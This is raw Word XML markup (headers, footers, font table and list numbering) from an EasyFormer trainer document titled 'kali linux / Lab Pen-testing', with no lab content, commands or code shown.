      <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="567" w:footer="397"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before="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
      <w:r/>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p>
      <w:pPr>
        <w:spacing w:before="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Consolas">
    <w:panose1 w:val="020B0606030504020204"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:panose1 w:val="020B0604030504040204"/>
  </w:font>
  <w:font w:name="Arial Gras">
    <w:panose1 w:val="020B0604020202020204"/>
  </w:font>
  <w:font w:name="FrankRuehl">
    <w:panose1 w:val="020B0600000101010101"/>
  </w:font>
  <w:font w:name="Times New Roman">
    <w:panose1 w:val="02020603050405020304"/>
  </w:font>
  <w:font w:name="Arial">
    <w:panose1 w:val="020B0604020202020204"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:panose1 w:val="020F050202020403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6"/>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">Easyformer - </w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">12</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> rue des violettes</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> -</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> 95000 Cergy</w:t>
    </w:r>
    <w:r/>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="976"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">    E</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">mail : </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">info@easyformer</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">.fr</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">   Web :</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:t xml:space="preserve">www.easyformer.fr</w:t>
    </w:r>
    <w:r/>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="976"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:spacing w:val="-6"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Document réservé aux formateurs EasyFormer</w:t>
    </w:r>
    <w:r/>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="976"/>
      <w:spacing w:before="0" w:after="0"/>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356" w:type="dxa"/>
      <w:tblInd w:w="-72" w:type="dxa"/>
      <w:tblBorders>
        <w:insideH w:val="single" w:color="0A9E97" w:sz="4" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:left w:w="70" w:type="dxa"/>
        <w:right w:w="70" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="1418"/>
      <w:gridCol w:w="6237"/>
      <w:gridCol w:w="1701"/>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="285"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1418" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:ind w:left="-68" w:right="-68"/>
            <w:spacing w:before="0" w:after="40"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:bCs/>
              <w:spacing w:val="60"/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:object w:dxaOrig="960" w:dyaOrig="96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2.5pt;height:44.4pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" filled="f" stroked="f">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId1" o:title=""/>
              </v:shape>
              <o:OLEObject DrawAspect="Content" r:id="rId2" ObjectID="_1525041" ProgID="PBrush" ShapeID="_x0000_i1" Type="Embed"/>
            </w:object>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6237" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="978"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> STYLEREF Type-document \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t xml:space="preserve">Vulnérabilités Postes Clients</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:t xml:space="preserve">    </w:t>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="978"/>
            <w:ind w:right="-57"/>
            <w:jc w:val="right"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Page </w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGE </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t xml:space="preserve">2</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> sur </w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> NUMPAGES  \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t xml:space="preserve">25</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr>
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="285"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1418" w:type="dxa"/>
          <w:vMerge w:val="continue"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:ind w:left="68" w:right="-68"/>
          </w:pPr>
          <w:r/>
          <w:r/>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6237" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="978"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">© EASYFORMER 2016 - Tous droits réservés</w:t>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="978"/>
            <w:ind w:right="-57"/>
            <w:jc w:val="right"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Date : </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="983"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="983"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> DATE \@ "dd/MM/yy" \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="983"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="983"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:t xml:space="preserve">28/12/22</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="983"/>
              <w:sz w:val="18"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="976"/>
      <w:ind w:left="0"/>
      <w:jc w:val="left"/>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before="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
      <w:r/>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p>
      <w:pPr>
        <w:spacing w:before="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8080" w:type="dxa"/>
      <w:tblInd w:w="637" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:color="auto" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="auto" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="auto" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="auto" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:left w:w="70" w:type="dxa"/>
        <w:right w:w="70" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="8080"/>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="1416"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          </w:tcBorders>
          <w:tcW w:w="8080" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="981"/>
            <w:jc w:val="center"/>
            <w:spacing w:before="0"/>
            <w:rPr>
              <w:color w:val="3a1d00"/>
              <w:spacing w:val="-6"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:i/>
              <w:color w:val="3a1d00"/>
              <w:spacing w:val="-6"/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                    <wp:extent cx="1133475" cy="323850"/>
                    <wp:effectExtent l="0" t="0" r="0" b="0"/>
                    <wp:docPr id="1" name="Image 9"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pic:cNvPicPr>
                            <pic:nvPr/>
                          </pic:nvPicPr>
                          <pic:blipFill>
                            <a:blip r:embed="rId1"/>
                            <a:stretch/>
                          </pic:blipFill>
                          <pic:spPr bwMode="auto">
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="1133475" cy="323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89.2pt;height:25.5pt;mso-wrap-distance-left:0.0pt;mso-wrap-distance-top:0.0pt;mso-wrap-distance-right:0.0pt;mso-wrap-distance-bottom:0.0pt;" stroked="f">
                    <v:path textboxrect="0,0,0,0"/>
                    <v:imagedata r:id="rId1" o:title=""/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="981"/>
            <w:jc w:val="center"/>
            <w:spacing w:before="0"/>
            <w:rPr>
              <w:rFonts w:cs="FrankRuehl"/>
              <w:b/>
              <w:i/>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
              <w:lang w:bidi="he-IL"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:cs="FrankRuehl"/>
              <w:b/>
              <w:i/>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
              <w:spacing w:val="-6"/>
              <w:lang w:bidi="he-IL"/>
            </w:rPr>
            <w:t xml:space="preserve">La formation à 360°</w:t>
          </w:r>
          <w:r/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:ind w:left="-68" w:right="-70"/>
            <w:jc w:val="center"/>
            <w:spacing w:before="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:color w:val="000000"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:color w:val="000000"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="1029"/>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214" w:type="dxa"/>
      <w:tblInd w:w="70" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:color="auto" w:sz="8" w:space="0"/>
        <w:left w:val="single" w:color="auto" w:sz="8" w:space="0"/>
        <w:bottom w:val="single" w:color="auto" w:sz="8" w:space="0"/>
        <w:right w:val="single" w:color="auto" w:sz="8" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:left w:w="70" w:type="dxa"/>
        <w:right w:w="70" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="5670"/>
      <w:gridCol w:w="2410"/>
      <w:gridCol w:w="1134"/>
    </w:tblGrid>
    <w:tr>
      <w:trPr>
        <w:cantSplit/>
        <w:trHeight w:val="350"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          </w:tcBorders>
          <w:tcW w:w="5670" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="978"/>
            <w:ind w:left="-68" w:right="0"/>
            <w:jc w:val="left"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> STYLEREF "Titre du document" \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t xml:space="preserve">kali linux / Lab Pen-testing</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          </w:tcBorders>
          <w:tcW w:w="2410" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="978"/>
            <w:ind w:left="-70" w:right="0"/>
            <w:jc w:val="left"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Référence : </w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> STYLEREF Titre-projet \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t xml:space="preserve">EF-TEST-TEST</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          </w:tcBorders>
          <w:tcW w:w="1134" w:type="dxa"/>
          <w:vAlign w:val="center"/>
          <w:textDirection w:val="lrTb"/>
          <w:noWrap w:val="false"/>
        </w:tcPr>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="978"/>
            <w:ind w:left="-70" w:right="0"/>
            <w:jc w:val="right"/>
            <w:spacing w:before="0" w:after="0"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Version : </w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> STYLEREF N°Version \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t xml:space="preserve">1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r/>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p>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1004"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="360" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts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bullet"/>
      <w:pStyle w:val="1028"/>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
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:pStyle w:val="1026"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="369" w:hanging="341"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="388" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="18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lowerLetter"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="18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lowerLetter"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="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777" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1497" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2217" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2937" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3657" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4377" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5097" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5817" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6537" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="1006"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="708" w:hanging="283"/>
        <w:tabs>
          <w:tab w:val="num" w:pos="0" w:leader="none"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="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styleLink w:val="1057"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1057"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="340" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%2.%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl w:val="false"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%2.%1.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr/>
      <w:rPr>
        <w:rFonts w:hint="default" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
